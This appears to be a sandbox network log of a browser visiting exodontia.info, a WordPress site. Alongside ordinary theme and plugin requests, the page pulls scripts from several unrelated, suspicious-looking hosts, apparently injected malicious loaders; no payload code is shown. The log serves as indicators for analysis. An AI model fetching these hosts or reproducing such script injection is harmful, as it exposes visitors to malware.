Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fexodon&oit=3&cp=14&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fexodonti&oit=3&cp=16&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fexodontia.&oit=3&cp=18&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fexodontia.i&oit=3&cp=19&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fexodontia.in&oit=3&cp=20&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fexodontia.inf&oit=3&cp=21&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/themify-shoppe/js/themify.script.js?ver=5.7.0 HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/themify-concate/826651810/themify-157411406.css HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/loading-page/css/loading-page.css?ver=free-1.1.10 HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wp-gdpr-compliance/Assets/css/front.css?ver=1706555011 HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/themify-shoppe/themify/themify-builder/js/themify.builder.script.js?ver=5.6.4 HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /WyNzslZcNXc4hHNvLCDDiTamINVoxtt-L-d6Ayg3PMl HTTP/1.1Host: funcallback.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/loading-page/loading-screens/bar/loading-bar.js?ver=free-1.1.10 HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3D%26oit%3D0%26gs_rn%3D42%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGOq2o7EGIjCFqtejcJY6F0uPQ2ZgEB_9ydMr9SMKXELgCbU-jevUbU7nAYltJT1tCsx5jLDtktQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/loading-page/js/loading-page.min.js?ver=free-1.1.10 HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/wp-gdpr-compliance/Assets/js/front.min.js?ver=1706555011 HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/06/Exodontia-Homepage-01-copy.png HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/plugins/loading-page/css/fonts/JTURjIg1_i6t8kCHKm45_bZF3gnD_g.woff2 HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://exodontia.infosec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://exodontia.info/wp-content/plugins/loading-page/css/loading-page.css?ver=free-1.1.10Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/themify-shoppe/themify/js/modules/themify.sidemenu.js?ver=5.6.4 HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/06/Exodontia-Homepage-01-copy.png HTTP/1.1Host: exodontia.infoConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/07/Exodontia-Homepage-01-copy.png HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/themify-shoppe/themify/js/main.js?ver=5.6.4 HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /+6N67YCBGYSfgUDfzZBWz4mBQM+X0RyGi80NjJ/FF4eJwViQ HTTP/1.1Host: stake.libertariancounterpoint.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /9hFXWz7m HTTP/1.1Host: debasesingle.lifeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SDQxw16j HTTP/1.1Host: gspiceyl.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/06/ExodoniaBWML.png HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953647.0.0.0; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/06/shutterstock_1642040905-scaled.jpg HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://exodontia.info/wp-content/uploads/themify-concate/826651810/themify-157411406.cssAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953647.0.0.0; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0
Source: global trafficHTTP traffic detected: GET /wp-content/themes/themify-shoppe/themify/themify-builder/css/modules/cover.css?ver=5.6.4 HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953647.0.0.0; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0
Source: global trafficHTTP traffic detected: GET /9hFXWz7m HTTP/1.1Host: debasesingle.lifeConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wikipedia/commons/e/e1/Google_Chrome_icon_%28February_2022%29.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2021/06/ExodoniaBWML.png HTTP/1.1Host: exodontia.infoConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953647.0.0.0; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0
Source: global trafficHTTP traffic detected: GET /wikipedia/commons/e/e1/Google_Chrome_icon_%28February_2022%29.svg HTTP/1.1Host: upload.wikimedia.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/themify-shoppe/themify/js/modules/edge.Menu.js?ver=5.6.4 HTTP/1.1Host: exodontia.infoConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://exodontia.info/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: _gid=GA1.2.726087517.1713953648; _gat_gtag_UA_202665315_1=1; _ga=GA1.1.97673467.1713953648; _ga_BW7F70S0MZ=GS1.1.1713953648.1.0.1713953648.0.0.0; _ga_XW48SKHQ61=GS1.1.1713953647.1.0.1713953650.0.0.0
